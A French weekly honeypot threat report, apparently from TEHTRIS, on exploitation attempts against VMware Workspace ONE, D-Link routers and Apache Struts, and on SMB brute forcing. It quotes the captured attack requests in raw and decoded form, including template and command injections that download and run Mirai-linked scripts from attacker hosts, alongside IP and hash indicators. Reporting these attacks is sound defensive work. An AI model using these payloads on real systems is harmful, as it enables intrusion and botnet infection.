L’analyse des honeypots de TEHTRIS permet d’obtenir des informations sur les types de scans et d’actions malveillantes réalisés par les cyberattaquants. Jetons un œil à 4 types d’événements observés en semaine 45.
Tentative d’exploitation de la vulnérabilité VMware CVE-2022-22954 (CVSSv3 9.8)
L’adresse IP américaine 85.31.44[.]167 (AS400377 Serverion LLC) a tenté d’exploiter la vulnérabilité critique de VMware CVE-2022-22954 (CVSSv3 9.8) en ciblant des infrastructures belge, allemande, italienne, néerlandaise et britannique.
La CVE-2022-22954 concerne VMware Workspace ONE Access and Identity Manager. Il s’agit d’une vulnérabilité de type SSTI (Server-Side Template Injection). Les moteurs de template sont des outils utilisés par les développeurs web pour insérer des données dynamiques dans les pages web permettant de dissocier les composants d’une page. Une faille de sécurité dans un fichier de template peut permettre à un attaquant d’exécuter du code arbitraire à distance.
Dans le cas présent, l’attaquant a recours aux deux requêtes suivantes :
/catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F85.31.44.190%2F76d32c.sh%3B%20chmod%20777%2076d32c.sh%3B%20sh%2076d32c.sh%22%29%7D/catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F85.31.44.190%2Fc.sh%3B%20chmod%20777%20c.sh%3B%20sh%20c.sh%20ducdepzai%22%29%7DURL decode :
/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http://85.31.44.190/76d32c.sh; chmod 777 76d32c.sh; sh 76d32c.sh")}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http://85.31.44.190/c.sh; chmod 777 c.sh; sh c.sh ducdepzai")}Le composant du template que l’attaquant tente d’exploiter est « Freemarker ». Si la vulnérabilité était active sur le serveur ciblé, un fichier nommé c.sh ou 76d32c.sh serait rapatrié de l’adresse IP contrôlée par l’attaquant et enregistrée auprès du même AS : 85.31.44[.]190 (AS400377 – Serverion LLC). Cette adresse IP est défavorablement connue des bases de données publiques, et télécharge des fichiers malveillants depuis le 11/11/22, notamment un variant de Mirai , le logiciel malveillant très actif qui infecte des machines et objets connectés pour les enrôler dans un botnet (SHA256 eeb5f604bfd02de92ee3805861ecb841a0a289e7c6272e573c82ba7093abfb75), et des fichiers associés à des trojans tels que les SHA c4775b45329c83b8ec0a364640bb39c66a375fedca3446566bc2f43603a1b87f et c426e05c76d6dda0725d7aeb10438dcec5866cabbf7e268520bad630cce83651.
Vulnérabilité RCE sur des routeurs D-Link
Trois adresses IP ont tenté d’exploiter une vulnérabilité d’exécution de code arbitraire à distance (RCE) sur des routeurs D-Link avec la requête suivante :
/login.cgi?cli=aa%20aa%27;wget%20http[:]//amkbins[.]duckdns[.]org/bins/ascaris[.]mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$URL decode:
/login.cgi?cli=aa aa';wget http[:]//amkbins[.]duckdns[.]org/bins/ascaris[.]mips -O -> /tmp/ascaris;chmod 777 /tmp/ascaris;/tmp/ascaris dlink.selfrep'$Cette requête a pour but d’exploiter la vulnérabilité pour télécharger un malware depuis l’URL http[:]//amkbins[.]duckdns[.]org/bins/ascaris[.]mips. Cet URL a été vu pour la première fois le 23/10/22 et – au moment de la rédaction de cet article – pour la dernière fois le 14/11/22 téléchargeant le fichierSHA256 2de8419c23afff994bbc54d642e7989f471e6dc6eadaa4e443be9d5a001e5e2b du botnet Mirai.
IoC :
| Adresse IP | AS | Pays |
| 203.243.13[.]53 | AS4766 (Korea Telecom) | KR |
| 209.169.97[.]91 | AS6300 (CCI-TEXAS) | US |
| 36.99.136[.]128 | AS 137687 (Luoyang, Henan Province, P.R.China.) | CN |
Pour rappel, des tentatives d’exploitation de vulnérabilité sur des routeurs D-Link avaient déjà été observées en semaine 38 et en semaine 43.
Tentative d’exploitation de la CVE-2017-5638
7 adresses IP ont observé un comportement similaire et ont scanné des vulnérabilités sur le réseau de honeypots de TEHTRIS. Parmi les vulnérabilités qu’elles ont tenté d’exploiter se trouve la CVE-2017-5638 (CVSSv3. 10) découverte dans Apache Struts en 2017, qui permet à un attaquant de provoquer une exécution de code arbitraire à distance.
La vulnérabilité est exploitée par la mention contenue dans le champ Headers :
['accept-encoding: gzip', 'connection: close', 'accept: */*', "content-type: %{#context[\\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\\'].addHeader(\\'[24thg56f]\\',\\'1\\')}.multipart/form-data"]La mention entre crochets change d’une requête à l’autre (il s’agit peut-être d’un ID unique attribué par l’attaquant pour vérifier la vulnérabilité du système ciblé).
| Adresse IP | AS | Pays |
| 103.165.37[.]69 | AS17995 ( PT iForte Global Internet ) | ID |
| 113.161.30[.]189 | AS 45899 ( VNPT Corp ) | VN |
| 172.245.126[.]63 | AS 36352 ( AS-COLOCROSSING ) | US |
| 186.250.136[.]213 | AS 262981 ( Pinpoint Tec. Pesq. Software Ltda-ME ) | BR |
| 190.220.22[.]11 | AS 19037 ( AMX Argentina S.A. ) | AR |
| 51.145.114[.]15 | AS 8075 ( MICROSOFT-CORP-MSN-AS-BLOCK ) | GB |
| 52.224.74[.]46 | AS 8075 ( MICROSOFT-CORP-MSN-AS-BLOCK ) | US |
Les adresses IP 172.245.126[.]63, 186.250.136[.]213 et 52.224.74[.]46 ne sont pas connues des bases de données publiques.
Quant à l’IP vietnamienne 113.161.30[.]189, elle est notamment connue pour avoir des liens avec un trojan de SHA256 249bd5e88fd81d7461880554becbc4ca5f2b2b7e6bfb98ed940f0df08ebd3c65.
Bruteforce sur le protocole SMB
Le protocole SMB est un protocole utilisé sous Windows et qui permet à des machines d’un même réseau d’échanger des fichiers. Cette semaine, deux IP (sur un total de 41 000 IP observées) ont réalisé plus de 20% des tentatives de pénétration via le protocole SMB faites sur les honeypots de TEHTRIS.
La première est l’IP vénézuélienne 201.211.189[.]86 (AS8048 – CANTV Servicios). Cette IP n’est pas connue des bases de données publiques regroupant les IP aux activités malveillantes. Plus de 200 000 fois en l’espace d’une semaine, l’IP a testé 12 logins, dont des noms en espagnol tels que Invitado, Cuentas, usuario ou encore tecnico01.
La seconde est l’IP colombienne 200.91.234[.]42 (AS18747 – IFX18747). Cette IP a fait plus de 198 000 tentatives sur la semaine 45, testant également 12 logins dont la plupart sont en espagnol (dont sistemas, usuario, cuentas ou invitado).